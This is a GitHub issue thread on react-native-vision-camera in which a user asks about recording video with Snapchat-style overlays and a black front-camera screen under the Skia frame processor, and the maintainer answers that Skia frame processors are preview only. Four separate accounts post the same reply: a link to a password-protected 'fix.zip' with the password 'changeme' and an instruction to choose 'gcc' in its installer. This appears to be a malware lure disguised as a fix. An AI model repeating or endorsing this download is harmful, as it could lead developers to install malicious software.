margelo/react-native-vision-camera #3154: 💭 Do you have any reference code for recording videos with overlays similar to Snapchat filters? When using the Skia frame processor, the front camera is displaying a black screen.

shishi-RN, 2024-08-26:
### Question

💭 Do you have any reference code for recording videos with overlays similar to Snapchat filters? When using the Skia frame processor, the front camera is displaying a black screen.

### What I tried

💭 Do you have any reference code for recording videos with overlays similar to Snapchat filters? When using the Skia frame processor, the front camera is displaying a black screen.

### VisionCamera Version

^4.5.1

### Additional information

- [ ] I am using Expo
- [X] I have read the [Troubleshooting Guide](https://react-native-vision-camera.com/docs/guides/troubleshooting)
- [X] I agree to follow this project's [Code of Conduct](https://github.com/mrousavy/react-native-vision-camera/blob/main/CODE_OF_CONDUCT.md)
- [X] I searched for similar questions [in the issues page](https://github.com/mrousavy/react-native-vision-camera/issues?q=is%3Aopen+is%3Aissue+label%3A%22💭+question%22) as well as [in the discussions page](https://github.com/mrousavy/react-native-vision-camera/discussions) and found none.

pilot5657, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

llowvxe, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

MoonShadowIllusion, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

mrousavy, 2024-08-27:
There's a bunch of example repos out there I created for this. Skia Frame Processors is preview only though, see https://react-native-vision-camera.com/docs/guides/skia-frame-processors

closed 2024-08-27 by mrousavy